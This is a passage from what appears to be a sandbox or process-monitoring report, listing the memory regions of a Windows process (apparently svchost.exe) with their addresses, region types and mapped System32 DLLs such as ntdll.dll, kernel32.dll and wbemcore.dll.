end_va = 0x2ecffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002dd0000"
filename = ""
Region:
id = 1322
start_va = 0x2f20000
end_va = 0x2f2ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f20000"
filename = ""
Region:
id = 1323
start_va = 0x2f80000
end_va = 0x2f8ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f80000"
filename = ""
Region:
id = 1324
start_va = 0x2f90000
end_va = 0x300ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000002f90000"
filename = ""
Region:
id = 1325
start_va = 0x3150000
end_va = 0x31cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003150000"
filename = ""
Region:
id = 1326
start_va = 0x32d0000
end_va = 0x334ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000032d0000"
filename = ""
Region:
id = 1327
start_va = 0x3350000
end_va = 0x33cffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003350000"
filename = ""
Region:
id = 1328
start_va = 0x33e0000
end_va = 0x345ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000033e0000"
filename = ""
Region:
id = 1329
start_va = 0x3460000
end_va = 0x355ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003460000"
filename = ""
Region:
id = 1330
start_va = 0x3590000
end_va = 0x360ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003590000"
filename = ""
Region:
id = 1331
start_va = 0x3630000
end_va = 0x36affff
entry_point = 0x0
region_type = private
name = "private_0x0000000003630000"
filename = ""
Region:
id = 1332
start_va = 0x3890000
end_va = 0x390ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003890000"
filename = ""
Region:
id = 1333
start_va = 0x39d0000
end_va = 0x3acffff
entry_point = 0x0
region_type = private
name = "private_0x00000000039d0000"
filename = ""
Region:
id = 1334
start_va = 0x3b80000
end_va = 0x3bfffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003b80000"
filename = ""
Region:
id = 1335
start_va = 0x3c60000
end_va = 0x3cdffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003c60000"
filename = ""
Region:
id = 1336
start_va = 0x3ce0000
end_va = 0x3edffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003ce0000"
filename = ""
Region:
id = 1337
start_va = 0x3f70000
end_va = 0x3feffff
entry_point = 0x0
region_type = private
name = "private_0x0000000003f70000"
filename = ""
Region:
id = 1338
start_va = 0x4020000
end_va = 0x409ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004020000"
filename = ""
Region:
id = 1339
start_va = 0x40b0000
end_va = 0x412ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000040b0000"
filename = ""
Region:
id = 1340
start_va = 0x4190000
end_va = 0x420ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004190000"
filename = ""
Region:
id = 1341
start_va = 0x4220000
end_va = 0x429ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004220000"
filename = ""
Region:
id = 1342
start_va = 0x4300000
end_va = 0x437ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004300000"
filename = ""
Region:
id = 1343
start_va = 0x43c0000
end_va = 0x443ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000043c0000"
filename = ""
Region:
id = 1344
start_va = 0x4440000
end_va = 0x463ffff
entry_point = 0x0
region_type = private
name = "private_0x0000000004440000"
filename = ""
Region:
id = 1345
start_va = 0x46d0000
end_va = 0x474ffff
entry_point = 0x0
region_type = private
name = "private_0x00000000046d0000"
filename = ""
Region:
id = 1346
start_va = 0x77a20000
end_va = 0x77b19fff
entry_point = 0x77a20000
region_type = mapped_file
name = "user32.dll"
filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll")
Region:
id = 1347
start_va = 0x77b20000
end_va = 0x77c3efff
entry_point = 0x77b20000
region_type = mapped_file
name = "kernel32.dll"
filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll")
Region:
id = 1348
start_va = 0x77c40000
end_va = 0x77de8fff
entry_point = 0x77c40000
region_type = mapped_file
name = "ntdll.dll"
filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll")
Region:
id = 1349
start_va = 0x7efe0000
end_va = 0x7f0dffff
entry_point = 0x0
region_type = pagefile_backed
name = "pagefile_0x000000007efe0000"
filename = ""
Region:
id = 1350
start_va = 0x7f0e0000
end_va = 0x7ffdffff
entry_point = 0x0
region_type = private
name = "private_0x000000007f0e0000"
filename = ""
Region:
id = 1351
start_va = 0x7ffe0000
end_va = 0x7ffeffff
entry_point = 0x0
region_type = private
name = "private_0x000000007ffe0000"
filename = ""
Region:
id = 1352
start_va = 0xffc20000
end_va = 0xffc2afff
entry_point = 0xffc20000
region_type = mapped_file
name = "svchost.exe"
filename = "\\Windows\\System32\\svchost.exe" (normalized: "c:\\windows\\system32\\svchost.exe")
Region:
id = 1353
start_va = 0x7fee2fc0000
end_va = 0x7fee3091fff
entry_point = 0x7fee2fc0000
region_type = mapped_file
name = "qmgr.dll"
filename = "\\Windows\\System32\\qmgr.dll" (normalized: "c:\\windows\\system32\\qmgr.dll")
Region:
id = 1354
start_va = 0x7fef31c0000
end_va = 0x7fef31d5fff
entry_point = 0x7fef31c0000
region_type = mapped_file
name = "ncprov.dll"
filename = "\\Windows\\System32\\wbem\\NCProv.dll" (normalized: "c:\\windows\\system32\\wbem\\ncprov.dll")
Region:
id = 1355
start_va = 0x7fef36f0000
end_va = 0x7fef3731fff
entry_point = 0x7fef36f0000
region_type = mapped_file
name = "tcpipcfg.dll"
filename = "\\Windows\\System32\\tcpipcfg.dll" (normalized: "c:\\windows\\system32\\tcpipcfg.dll")
Region:
id = 1356
start_va = 0x7fef4dd0000
end_va = 0x7fef4e09fff
entry_point = 0x7fef4dd0000
region_type = mapped_file
name = "mprapi.dll"
filename = "\\Windows\\System32\\mprapi.dll" (normalized: "c:\\windows\\system32\\mprapi.dll")
Region:
id = 1357
start_va = 0x7fef59b0000
end_va = 0x7fef59b9fff
entry_point = 0x7fef59b0000
region_type = mapped_file
name = "bitsperf.dll"
filename = "\\Windows\\System32\\bitsperf.dll" (normalized: "c:\\windows\\system32\\bitsperf.dll")
Region:
id = 1358
start_va = 0x7fef59c0000
end_va = 0x7fef59cbfff
entry_point = 0x7fef59c0000
region_type = mapped_file
name = "npmproxy.dll"
filename = "\\Windows\\System32\\npmproxy.dll" (normalized: "c:\\windows\\system32\\npmproxy.dll")
Region:
id = 1359
start_va = 0x7fef5b20000
end_va = 0x7fef5b9dfff
entry_point = 0x7fef5b20000
region_type = mapped_file
name = "wbemess.dll"
filename = "\\Windows\\System32\\wbem\\wbemess.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemess.dll")
Region:
id = 1360
start_va = 0x7fef5ba0000
end_va = 0x7fef5bb5fff
entry_point = 0x7fef5ba0000
region_type = mapped_file
name = "ncobjapi.dll"
filename = "\\Windows\\System32\\ncobjapi.dll" (normalized: "c:\\windows\\system32\\ncobjapi.dll")
Region:
id = 1361
start_va = 0x7fef5bc0000
end_va = 0x7fef5c7bfff
entry_point = 0x7fef5bc0000
region_type = mapped_file
name = "wmiprvsd.dll"
filename = "\\Windows\\System32\\wbem\\WmiPrvSD.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiprvsd.dll")
Region:
id = 1362
start_va = 0x7fef5c80000
end_va = 0x7fef5cf2fff
entry_point = 0x7fef5c80000
region_type = mapped_file
name = "repdrvfs.dll"
filename = "\\Windows\\System32\\wbem\\repdrvfs.dll" (normalized: "c:\\windows\\system32\\wbem\\repdrvfs.dll")
Region:
id = 1363
start_va = 0x7fef5d00000
end_va = 0x7fef5d25fff
entry_point = 0x7fef5d00000
region_type = mapped_file
name = "wmiutils.dll"
filename = "\\Windows\\System32\\wbem\\wmiutils.dll" (normalized: "c:\\windows\\system32\\wbem\\wmiutils.dll")
Region:
id = 1364
start_va = 0x7fef5d30000
end_va = 0x7fef5d9afff
entry_point = 0x7fef5d30000
region_type = mapped_file
name = "hnetcfg.dll"
filename = "\\Windows\\System32\\hnetcfg.dll" (normalized: "c:\\windows\\system32\\hnetcfg.dll")
Region:
id = 1365
start_va = 0x7fef5da0000
end_va = 0x7fef5db8fff
entry_point = 0x7fef5da0000
region_type = mapped_file
name = "resutils.dll"
filename = "\\Windows\\System32\\resutils.dll" (normalized: "c:\\windows\\system32\\resutils.dll")
Region:
id = 1366
start_va = 0x7fef5dc0000
end_va = 0x7fef5e0ffff
entry_point = 0x7fef5dc0000
region_type = mapped_file
name = "clusapi.dll"
filename = "\\Windows\\System32\\clusapi.dll" (normalized: "c:\\windows\\system32\\clusapi.dll")
Region:
id = 1367
start_va = 0x7fef5e10000
end_va = 0x7fef5e23fff
entry_point = 0x7fef5e10000
region_type = mapped_file
name = "wbemsvc.dll"
filename = "\\Windows\\System32\\wbem\\wbemsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemsvc.dll")
Region:
id = 1368
start_va = 0x7fef5e30000
end_va = 0x7fef5e9efff
entry_point = 0x7fef5e30000
region_type = mapped_file
name = "esscli.dll"
filename = "\\Windows\\System32\\wbem\\esscli.dll" (normalized: "c:\\windows\\system32\\wbem\\esscli.dll")
Region:
id = 1369
start_va = 0x7fef5ea0000
end_va = 0x7fef5fcefff
entry_point = 0x7fef5ea0000
region_type = mapped_file
name = "wbemcore.dll"
filename = "\\Windows\\System32\\wbem\\wbemcore.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemcore.dll")
Region:
id = 1370
start_va = 0x7fef5fd0000
end_va = 0x7fef5fe9fff
entry_point = 0x7fef5fd0000
region_type = mapped_file
name = "nci.dll"
filename = "\\Windows\\System32\\nci.dll" (normalized: "c:\\windows\\system32\\nci.dll")
Region:
id = 1371
start_va = 0x7fef5ff0000
end_va = 0x7fef6063fff
entry_point = 0x7fef5ff0000
region_type = mapped_file
name = "netprofm.dll"
filename = "\\Windows\\System32\\netprofm.dll" (normalized: "c:\\windows\\system32\\netprofm.dll")
Region:
id = 1372
start_va = 0x7fef6070000
end_va = 0x7fef60f3fff
entry_point = 0x7fef6070000
region_type = mapped_file
name = "netcfgx.dll"
filename = "\\Windows\\System32\\netcfgx.dll" (normalized: "c:\\windows\\system32\\netcfgx.dll")
Region:
id = 1373
start_va = 0x7fef6300000
end_va = 0x7fef6324fff
entry_point = 0x7fef6300000
region_type = mapped_file
name = "browser.dll"
filename = "\\Windows\\System32\\browser.dll" (normalized: "c:\\windows\\system32\\browser.dll")
Region:
id = 1374
start_va = 0x7fef6330000
end_va = 0x7fef636cfff
entry_point = 0x7fef6330000
region_type = mapped_file
name = "srvsvc.dll"
filename = "\\Windows\\System32\\srvsvc.dll" (normalized: "c:\\windows\\system32\\srvsvc.dll")
Region:
id = 1375
start_va = 0x7fef6370000
end_va = 0x7fef6396fff
entry_point = 0x7fef6370000
region_type = mapped_file
name = "ntdsapi.dll"
filename = "\\Windows\\System32\\ntdsapi.dll" (normalized: "c:\\windows\\system32\\ntdsapi.dll")
Region:
id = 1376
start_va = 0x7fef63a0000
end_va = 0x7fef6481fff
entry_point = 0x7fef63a0000
region_type = mapped_file
name = "fastprox.dll"
filename = "\\Windows\\System32\\wbem\\fastprox.dll" (normalized: "c:\\windows\\system32\\wbem\\fastprox.dll")
Region:
id = 1377
start_va = 0x7fef64d0000
end_va = 0x7fef6516fff
entry_point = 0x7fef64d0000
region_type = mapped_file
name = "wdscore.dll"
filename = "\\Windows\\System32\\wdscore.dll" (normalized: "c:\\windows\\system32\\wdscore.dll")
Region:
id = 1378
start_va = 0x7fef6520000
end_va = 0x7fef6561fff
entry_point = 0x7fef6520000
region_type = mapped_file
name = "sqmapi.dll"
filename = "\\Windows\\System32\\sqmapi.dll" (normalized: "c:\\windows\\system32\\sqmapi.dll")
Region:
id = 1379
start_va = 0x7fef6570000
end_va = 0x7fef6580fff
entry_point = 0x7fef6570000
region_type = mapped_file
name = "rtutils.dll"
filename = "\\Windows\\System32\\rtutils.dll" (normalized: "c:\\windows\\system32\\rtutils.dll")
Region:
id = 1380
start_va = 0x7fef6590000
end_va = 0x7fef6621fff
entry_point = 0x7fef6590000
region_type = mapped_file
name = "iphlpsvc.dll"
filename = "\\Windows\\System32\\iphlpsvc.dll" (normalized: "c:\\windows\\system32\\iphlpsvc.dll")
Region:
id = 1381
start_va = 0x7fef73c0000
end_va = 0x7fef73d6fff
entry_point = 0x7fef73c0000
region_type = mapped_file
name = "vsstrace.dll"
filename = "\\Windows\\System32\\vsstrace.dll" (normalized: "c:\\windows\\system32\\vsstrace.dll")
Region:
id = 1382
start_va = 0x7fef73e0000
end_va = 0x7fef758ffff
entry_point = 0x7fef73e0000
region_type = mapped_file
name = "vssapi.dll"
filename = "\\Windows\\System32\\vssapi.dll" (normalized: "c:\\windows\\system32\\vssapi.dll")
Region:
id = 1383
start_va = 0x7fef8120000
end_va = 0x7fef8128fff
entry_point = 0x7fef8120000
region_type = mapped_file
name = "tschannel.dll"
filename = "\\Windows\\System32\\TSChannel.dll" (normalized: "c:\\windows\\system32\\tschannel.dll")
Region:
id = 1384
start_va = 0x7fef8940000
end_va = 0x7fef8959fff
entry_point = 0x7fef8940000
region_type = mapped_file
name = "rascfg.dll"
filename = "\\Windows\\System32\\rascfg.dll" (normalized: "c:\\windows\\system32\\rascfg.dll")
Region:
id = 1385
start_va = 0x7fef8f60000
end_va = 0x7fef904dfff
entry_point = 0x7fef8f60000
region_type = mapped_file
name = "actxprxy.dll"
filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll")
Region:
id = 1386
start_va = 0x7fef9340000
end_va = 0x7fef934efff
entry_point = 0x7fef9340000
region_type = mapped_file
name = "ndiscapcfg.dll"
filename = "\\Windows\\System32\\ndiscapCfg.dll" (normalized: "c:\\windows\\system32\\ndiscapcfg.dll")
Region:
id = 1387
start_va = 0x7fef93c0000
end_va = 0x7fef9436fff
entry_point = 0x7fef93c0000
region_type = mapped_file
name = "taskcomp.dll"
filename = "\\Windows\\System32\\taskcomp.dll" (normalized: "c:\\windows\\system32\\taskcomp.dll")
Region:
id = 1388
start_va = 0x7fef9440000
end_va = 0x7fef9449fff
entry_point = 0x7fef9440000
region_type = mapped_file
name = "ktmw32.dll"
filename = "\\Windows\\System32\\ktmw32.dll" (normalized: "c:\\windows\\system32\\ktmw32.dll")
Region:
id = 1389
start_va = 0x7fef9450000
end_va = 0x7fef9561fff
entry_point = 0x7fef9450000
region_type = mapped_file
name = "schedsvc.dll"
filename = "\\Windows\\System32\\schedsvc.dll" (normalized: "c:\\windows\\system32\\schedsvc.dll")
Region:
id = 1390
start_va = 0x7fef9570000
end_va = 0x7fef957efff
entry_point = 0x7fef9570000
region_type = mapped_file
name = "wiarpc.dll"
filename = "\\Windows\\System32\\wiarpc.dll" (normalized: "c:\\windows\\system32\\wiarpc.dll")
Region:
id = 1391
start_va = 0x7fef9580000
end_va = 0x7fef9588fff
entry_point = 0x7fef9580000
region_type = mapped_file
name = "fvecerts.dll"
filename = "\\Windows\\System32\\fvecerts.dll" (normalized: "c:\\windows\\system32\\fvecerts.dll")
Region:
id = 1392
start_va = 0x7fef9590000
end_va = 0x7fef9598fff
entry_point = 0x7fef9590000
region_type = mapped_file
name = "tbs.dll"
filename = "\\Windows\\System32\\tbs.dll" (normalized: "c:\\windows\\system32\\tbs.dll")
Region:
id = 1393
start_va = 0x7fef95a0000
end_va = 0x7fef95f5fff
entry_point = 0x7fef95a0000
region_type = mapped_file
name = "fveapi.dll"
filename = "\\Windows\\System32\\fveapi.dll" (normalized: "c:\\windows\\system32\\fveapi.dll")
Region:
id = 1394
start_va = 0x7fef9600000
end_va = 0x7fef965dfff
entry_point = 0x7fef9600000
region_type = mapped_file
name = "shsvcs.dll"
filename = "\\Windows\\System32\\shsvcs.dll" (normalized: "c:\\windows\\system32\\shsvcs.dll")
Region:
id = 1395
start_va = 0x7fef9660000
end_va = 0x7fef9677fff
entry_point = 0x7fef9660000
region_type = mapped_file
name = "dhcpcsvc.dll"
filename = "\\Windows\\System32\\dhcpcsvc.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc.dll")
Region:
id = 1396
start_va = 0x7fef9680000
end_va = 0x7fef9690fff
entry_point = 0x7fef9680000
region_type = mapped_file
name = "dhcpcsvc6.dll"
filename = "\\Windows\\System32\\dhcpcsvc6.dll" (normalized: "c:\\windows\\system32\\dhcpcsvc6.dll")
Region:
id = 1397
start_va = 0x7fef96b0000
end_va = 0x7fef9702fff
entry_point = 0x7fef96b0000
region_type = mapped_file
name = "fwpuclnt.dll"
filename = "\\Windows\\System32\\FWPUCLNT.DLL" (normalized: "c:\\windows\\system32\\fwpuclnt.dll")
Region:
id = 1398
start_va = 0x7fefb650000
end_va = 0x7fefb663fff
entry_point = 0x7fefb650000
region_type = mapped_file
name = "sens.dll"
filename = "\\Windows\\System32\\Sens.dll" (normalized: "c:\\windows\\system32\\sens.dll")
Region:
id = 1399
start_va = 0x7fefb670000
end_va = 0x7fefb67afff
entry_point = 0x7fefb670000
region_type = mapped_file
name = "winnsi.dll"
filename = "\\Windows\\System32\\winnsi.dll" (normalized: "c:\\windows\\system32\\winnsi.dll")
Region:
id = 1400
start_va = 0x7fefb680000
end_va = 0x7fefb6a6fff
entry_point = 0x7fefb680000
region_type = mapped_file
name = "iphlpapi.dll"
filename = "\\Windows\\System32\\IPHLPAPI.DLL" (normalized: "c:\\windows\\system32\\iphlpapi.dll")
Region:
id = 1401
start_va = 0x7fefb6b0000
end_va = 0x7fefb716fff
entry_point = 0x7fefb6b0000
region_type = mapped_file
name = "es.dll"
filename = "\\Windows\\System32\\es.dll" (normalized: "c:\\windows\\system32\\es.dll")
Region:
id = 1402
start_va = 0x7fefb730000
end_va = 0x7fefb73afff
entry_point = 0x7fefb730000
region_type = mapped_file
name = "slc.dll"
filename = "\\Windows\\System32\\slc.dll" (normalized: "c:\\windows\\system32\\slc.dll")
Region:
id = 1403
start_va = 0x7fefb740000
end_va = 0x7fefb74bfff
entry_point = 0x7fefb740000
region_type = mapped_file
name = "dsrole.dll"
filename = "\\Windows\\System32\\dsrole.dll" (normalized: "c:\\windows\\system32\\dsrole.dll")
Region:
id = 1404
start_va = 0x7fefb750000
end_va = 0x7fefb75ffff
entry_point = 0x7fefb750000
region_type = mapped_file
name = "themeservice.dll"
filename = "\\Windows\\System32\\themeservice.dll" (normalized: "c:\\windows\\system32\\themeservice.dll")
Region:
id = 1405
start_va = 0x7fefb760000
end_va = 0x7fefb778fff
entry_point = 0x7fefb760000
region_type = mapped_file
name = "atl.dll"
filename = "\\Windows\\System32\\atl.dll" (normalized: "c:\\windows\\system32\\atl.dll")
Region:
id = 1406
start_va = 0x7fefb780000
end_va = 0x7fefb7b6fff
entry_point = 0x7fefb780000
region_type = mapped_file
name = "profsvc.dll"
filename = "\\Windows\\System32\\profsvc.dll" (normalized: "c:\\windows\\system32\\profsvc.dll")
Region:
id = 1407
start_va = 0x7fefb800000
end_va = 0x7fefb814fff
entry_point = 0x7fefb800000
region_type = mapped_file
name = "nlaapi.dll"
filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll")
Region:
id = 1408
start_va = 0x7fefb820000
end_va = 0x7fefb8e1fff
entry_point = 0x7fefb820000
region_type = mapped_file
name = "gpsvc.dll"
filename = "\\Windows\\System32\\gpsvc.dll" (normalized: "c:\\windows\\system32\\gpsvc.dll")
Region:
id = 1409
start_va = 0x7fefbb00000
end_va = 0x7fefbb2cfff
entry_point = 0x7fefbb00000
region_type = mapped_file
name = "ntmarta.dll"
filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll")
Region:
id = 1410
start_va = 0x7fefbb30000
end_va = 0x7fefbb4cfff
entry_point = 0x7fefbb30000
region_type = mapped_file
name = "mmcss.dll"
filename = "\\Windows\\System32\\mmcss.dll" (normalized: "c:\\windows\\system32\\mmcss.dll")
Region:
id = 1411
start_va = 0x7fefbb50000
end_va = 0x7fefbb58fff
entry_point = 0x7fefbb50000
region_type = mapped_file
name = "avrt.dll"
filename = "\\Windows\\System32\\avrt.dll" (normalized: "c:\\windows\\system32\\avrt.dll")
Region:
id = 1412
start_va = 0x7fefbc10000
end_va = 0x7fefbc17fff
entry_point = 0x7fefbc10000
region_type = mapped_file
name = "rasadhlp.dll"
filename = "\\Windows\\System32\\rasadhlp.dll" (normalized: "c:\\windows\\system32\\rasadhlp.dll")
Region:
id = 1413
start_va = 0x7fefbcd0000
end_va = 0x7fefbd55fff
entry_point = 0x7fefbcd0000
region_type = mapped_file
name = "wbemcomn.dll"
filename = "\\Windows\\System32\\wbemcomn.dll" (normalized: "c:\\windows\\system32\\wbemcomn.dll")
Region:
id = 1414
start_va = 0x7fefbd60000
end_va = 0x7fefbd73fff
entry_point = 0x7fefbd60000
region_type = mapped_file
name = "samcli.dll"
filename = "\\Windows\\System32\\samcli.dll" (normalized: "c:\\windows\\system32\\samcli.dll")
Region:
id = 1415
start_va = 0x7fefbd80000
end_va = 0x7fefbd94fff
entry_point = 0x7fefbd80000
region_type = mapped_file
name = "wkscli.dll"
filename = "\\Windows\\System32\\wkscli.dll" (normalized: "c:\\windows\\system32\\wkscli.dll")
Region:
id = 1416
start_va = 0x7fefbda0000
end_va = 0x7fefbdabfff
entry_point = 0x7fefbda0000
region_type = mapped_file
name = "netutils.dll"
filename = "\\Windows\\System32\\netutils.dll" (normalized: "c:\\windows\\system32\\netutils.dll")
Region:
id = 1417
start_va = 0x7fefbdb0000
end_va = 0x7fefbdc5fff
entry_point = 0x7fefbdb0000
region_type = mapped_file
name = "netapi32.dll"
filename = "\\Windows\\System32\\netapi32.dll" (normalized: "c:\\windows\\system32\\netapi32.dll")
Region:
id = 1418
start_va = 0x7fefbdd0000
end_va = 0x7fefbdd7fff
entry_point = 0x7fefbdd0000
region_type = mapped_file
name = "sscore.dll"
filename = "\\Windows\\System32\\sscore.dll" (normalized: "c:\\windows\\system32\\sscore.dll")
Region:
id = 1419
start_va = 0x7fefbe30000
end_va = 0x7fefbe6ffff
entry_point = 0x7fefbe30000
region_type = mapped_file
name = "wmisvc.dll"
filename = "\\Windows\\System32\\wbem\\WMIsvc.dll" (normalized: "c:\\windows\\system32\\wbem\\wmisvc.dll")
Region:
id = 1420
start_va = 0x7fefbee0000
end_va = 0x7fefbef0fff
entry_point = 0x7fefbee0000
region_type = mapped_file
name = "wtsapi32.dll"
filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll")
Region:
id = 1421
start_va = 0x7fefbf00000
end_va = 0x7fefbf0efff
entry_point = 0x7fefbf00000
region_type = mapped_file
name = "wbemprox.dll"
filename = "\\Windows\\System32\\wbem\\wbemprox.dll" (normalized: "c:\\windows\\system32\\wbem\\wbemprox.dll")
Region:
id = 1422
start_va = 0x7fefc040000
end_va = 0x7fefc074fff
entry_point = 0x7fefc040000
region_type = mapped_file
name = "xmllite.dll"
filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll")
Region:
id = 1423
start_va = 0x7fefc4b0000
end_va = 0x7fefc505fff
entry_point = 0x7fefc4b0000
region_type = mapped_file
name = "uxtheme.dll"
filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll")
Region:
id = 1424
start_va = 0x7fefc510000
end_va = 0x7fefc63bfff
entry_point = 0x7fefc510000
region_type = mapped_file
name = "propsys.dll"
filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll")
Region:
id = 1425
start_va = 0x7fefc640000
end_va = 0x7fefc65cfff
entry_point = 0x7fefc640000
region_type = mapped_file
name = "samlib.dll"
filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll")
Region:
id = 1426
start_va = 0x7fefc690000
end_va = 0x7fefc883fff
entry_point = 0x7fefc690000
region_type = mapped_file
name = "comctl32.dll"
filename = "\\Windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\amd64_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_fa396087175ac9ac\\comctl32.dll")
Region:
id = 1427
start_va = 0x7fefcd50000
end_va = 0x7fefcd5bfff
entry_point = 0x7fefcd50000
region_type = mapped_file
name = "version.dll"
filename = "\\Windows\\System32\\version.dll" (normalized: "c:\\windows\\system32\\version.dll")
Region:
id = 1428
start_va = 0x7fefcd60000
end_va = 0x7fefce1afff
entry_point = 0x7fefcd60000
region_type = mapped_file
name = "firewallapi.dll"
filename = "\\Windows\\System32\\FirewallAPI.dll" (normalized: "c:\\windows\\system32\\firewallapi.dll")
Region:
id = 1429
start_va = 0x7fefce20000
end_va = 0x7fefce26fff
entry_point = 0x7fefce20000
region_type = mapped_file
name = "wshtcpip.dll"
filename = "\\Windows\\System32\\WSHTCPIP.DLL" (normalized: "c:\\windows\\system32\\wshtcpip.dll")
Region:
id = 1430
start_va = 0x7fefcf10000
end_va = 0x7fefcf2afff
entry_point = 0x7fefcf10000
region_type = mapped_file
name = "gpapi.dll"
filename = "\\Windows\\System32\\gpapi.dll" (normalized: "c:\\windows\\system32\\gpapi.dll")
Region:
id = 1431
start_va = 0x7fefcf30000
end_va = 0x7fefcf4dfff
entry_point = 0x7fefcf30000
region_type = mapped_file
name = "userenv.dll"
filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll")
Region:
id = 1432
start_va = 0x7fefcf50000
end_va = 0x7fefcf61fff
entry_point = 0x7fefcf50000
region_type = mapped_file
name = "devrtl.dll"
filename = "\\Windows\\System32\\devrtl.dll" (normalized: "c:\\windows\\system32\\devrtl.dll")
Region:
id = 1433
start_va = 0x7fefcf70000
end_va = 0x7fefcf8efff
entry_point = 0x7fefcf70000
region_type = mapped_file
name = "spinf.dll"
filename = "\\Windows\\System32\\SPInf.dll" (normalized: "c:\\windows\\system32\\spinf.dll")
Region:
id = 1434
start_va = 0x7fefd040000
end_va = 0x7fefd078fff
entry_point = 0x7fefd040000
region_type = mapped_file
name = "ubpm.dll"
filename = "\\Windows\\System32\\ubpm.dll" (normalized: "c:\\windows\\system32\\ubpm.dll")
Region:
id = 1435
start_va = 0x7fefd080000
end_va = 0x7fefd089fff
entry_point = 0x7fefd080000
region_type = mapped_file
name = "credssp.dll"
filename = "\\Windows\\System32\\credssp.dll" (normalized: "c:\\windows\\system32\\credssp.dll")
Region:
id = 1436
start_va = 0x7fefd090000
end_va = 0x7fefd09cfff
entry_point = 0x7fefd090000
region_type = mapped_file
name = "pcwum.dll"
filename = "\\Windows\\System32\\pcwum.dll" (normalized: "c:\\windows\\system32\\pcwum.dll")
Region:
id = 1437
start_va = 0x7fefd180000
end_va = 0x7fefd1c6fff
entry_point = 0x7fefd180000
region_type = mapped_file
name = "rsaenh.dll"
filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll")
Region:
id = 1438
start_va = 0x7fefd270000
end_va = 0x7fefd29ffff
entry_point = 0x7fefd270000
region_type = mapped_file
name = "logoncli.dll"
filename = "\\Windows\\System32\\logoncli.dll" (normalized: "c:\\windows\\system32\\logoncli.dll")
Region:
id = 1439
start_va = 0x7fefd2a0000
end_va = 0x7fefd2fafff
entry_point = 0x7fefd2a0000
region_type = mapped_file
name = "dnsapi.dll"
filename = "\\Windows\\System32\\dnsapi.dll" (normalized: "c:\\windows\\system32\\dnsapi.dll")
Region:
id = 1440
start_va = 0x7fefd410000
end_va = 0x7fefd416fff
entry_point = 0x7fefd410000
region_type = mapped_file
name = "wship6.dll"
filename = "\\Windows\\System32\\wship6.dll" (normalized: "c:\\windows\\system32\\wship6.dll")
Region:
id = 1441
start_va = 0x7fefd420000
end_va = 0x7fefd474fff
entry_point = 0x7fefd420000
region_type = mapped_file
name = "mswsock.dll"
filename = "\\Windows\\System32\\mswsock.dll" (normalized: "c:\\windows\\system32\\mswsock.dll")
Region:
id = 1442
start_va = 0x7fefd480000
end_va = 0x7fefd496fff
entry_point = 0x7fefd480000
region_type = mapped_file
name = "cryptsp.dll"
filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll")
Region:
id = 1443
start_va = 0x7fefd590000
end_va = 0x7fefd5c1fff
entry_point = 0x7fefd590000
region_type = mapped_file
name = "netjoin.dll"
filename = "\\Windows\\System32\\netjoin.dll" (normalized: "c:\\windows\\system32\\netjoin.dll")
Region:
id = 1444
start_va = 0x7fefd5e0000
end_va = 0x7fefd5e9fff
entry_point = 0x7fefd5e0000
region_type = mapped_file
name = "sysntfy.dll"
filename = "\\Windows\\System32\\sysntfy.dll" (normalized: "c:\\windows\\system32\\sysntfy.dll")
Region:
id = 1445
start_va = 0x7fefd670000
end_va = 0x7fefd69efff
entry_point = 0x7fefd670000
region_type = mapped_file
name = "authz.dll"
filename = "\\Windows\\System32\\authz.dll" (normalized: "c:\\windows\\system32\\authz.dll")
Region:
id = 1446
start_va = 0x7fefd6b0000
end_va = 0x7fefd71cfff
entry_point = 0x7fefd6b0000
region_type = mapped_file
name = "wevtapi.dll"
filename = "\\Windows\\System32\\wevtapi.dll" (normalized: "c:\\windows\\system32\\wevtapi.dll")
Region:
id = 1447
start_va = 0x7fefd720000
end_va = 0x7fefd733fff
entry_point = 0x7fefd720000
region_type = mapped_file
name = "cryptdll.dll"
